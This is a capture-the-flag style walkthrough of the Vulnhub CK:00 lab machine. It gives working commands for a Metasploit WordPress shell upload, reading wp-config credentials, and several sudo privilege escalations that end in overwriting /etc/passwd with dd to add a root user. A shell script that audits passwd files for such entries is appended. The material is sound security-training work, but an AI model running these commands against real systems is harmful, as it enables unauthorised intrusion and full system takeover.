CK: 00 Vulnhub Walkthrough

In this article, we will walk through an interesting Vulnhub machine called CK: 00. This VM was made by Vishal Biswas and is hosted on Vulnhub, where you can download it.

Description

Goal: Your goal is to get the highest-privileged user and collect the flag.

Network Scanning

First, we run netdiscover to find our target IP.

netdiscover

In my case, the target IP is 192.168.1.14. Our next step is to perform an Nmap aggressive scan.

nmap -A -p- 192.168.1.14

I open the target IP in the browser and we see an error, so I copy the VM IP and create a virtual host entry for ck in the /etc/hosts file.

vi /etc/hosts
192.168.1.14 ck

Refresh the page again and we see the default WordPress template.

http://192.168.1.14

I try common passwords on the WordPress login, and I successfully log in to the administrator account with the username admin and the password admin.

We now have a WordPress login username and password. Without wasting time, I ran msfconsole and loaded the wp_admin_shell_upload exploit.

msfdb run
use exploit/unix/webapp/wp_admin_shell_upload
set username admin
set password admin
set rhost 192.168.1.14
run

I ran the shell command to get a command shell, and we see a blank shell. Let's spawn a bash shell through Python 3's pty module using this command:

shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

We found our flag in user ck's home directory.

cd ck
ls -lsa
cat ck00-local-flag

I move to the Apache server's public directory, where we see the WordPress wp-config.php. I read the file and we see the target's database username and password.

cd /var/www/html
cat wp-config.php

Privilege Escalation

I try the MySQL database password for every user, and we successfully log in as the bla user with the database password.

su bla
/bin/bash

Privilege Escalation scp

We have user bla's password, so I ran the sudo -l command, and we see that our current user can run the scp command as user bla1 without bla1's password.

sudo -l

I already generated an SSH key pair on our local machine with ssh-keygen. I upload our public key, id_rsa.pub, to user bla1's /home/bla1/.ssh/authorized_keys file using this command:

sudo -u bla1 scp [email protected]:~/.ssh/id_rsa.pub /home/bla1/.ssh/authorized_keys

The terminal shows that our key was uploaded successfully. I exit our shell and connect over SSH as user bla1 without a password.

ssh [email protected]

Privilege Escalation rbash

Run the sudo -l command again, and we see that we can run the /bin/rbash command as the user ck-00 without being asked for ck-00's password.

sudo -l
sudo -u ck-00 /bin/rbash

After executing the rbash command, many of our commands are restricted. There are many ways to escape restricted shells; I ran the sh command and the bash command and bypassed the restricted shell.

Privilege Escalation dd

Run the sudo -l command again, and finally we see that our user ck-00 can run the dd command without being asked for the root password.

sudo -l

I generate an MD5 salted password hash for our new user rahul.

openssl passwd -1 -salt rahul password
$1$rahul$7hgGd2S2A0ooTWXZ8YjwJ0

Using the cat command, we view the /etc/passwd file, copy its text, and create a new passwd file in ck's home directory, using the cat >> append method to paste our passwd entry.

cat >>passwd
rahul:$1$rahul$7hgGd2S2A0ooTWXZ8YjwJ0:0:0:root:/root:/bin/bash

I have already created a passwd file in the ck user's home directory, and our next step is to overwrite the /etc/passwd file with our new passwd file using this command:

cat passwd |sudo dd of=/etc/passwd

Our new user rahul and its password were written to the /etc/passwd file successfully. We confirm the username and password entry in the passwd file using the tail command.

tail -n 3 /etc/passwd
su rahul

Root Flag

cd /root
ls
cat ck00-root-flag.txt
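
From the defender's side, the entry appended in the dd step stands out: a second UID 0 account whose hash sits in /etc/passwd itself. The audit below is an added example, not part of the original walkthrough; the function names and the sample file (including the demo user) are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a passwd-format file for
# entries like the one written by the dd step above.

# audit_passwd [FILE] -> one finding per line, formatted "<check>:<username>".
# Reads standard input when no file is given.
audit_passwd() {
    awk -F: '
        /^[ \t]*$/ || /^#/ { next }                      # skip blanks and comments
        NF != 7 { print "malformed:" $1; next }          # hand-edited or truncated line
        $3 ~ /^0+$/ && $1 != "root" { print "extra-uid0:" $1 }
        $2 == ""      { print "empty-password:" $1 }
        $2 ~ /^\$/    { print "inline-hash:" $1 }        # hash kept outside /etc/shadow
        $2 ~ /^\$1\$/ { print "md5-crypt:" $1 }          # scheme produced by openssl passwd -1
    ' "${1:--}"
}

# Constructed sample: ordinary entries, the entry this page appends, and a
# hypothetical demo user whose line is missing a field separator.
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ck:x:1000:1000:ck:/home/ck:/bin/bash
rahul:$1$rahul$7hgGd2S2A0ooTWXZ8YjwJ0:0:0:root:/root:/bin/bash
demo:x:1001:1001:demo:/home/demo/bin/sh
EOF
}

# Audit the sample; on a real host call: audit_passwd /etc/passwd
sample_passwd | audit_passwd
```

Any finding on a production host is worth a look, and the root cause here remains the sudo rule that lets an unprivileged user run dd against arbitrary files.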

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
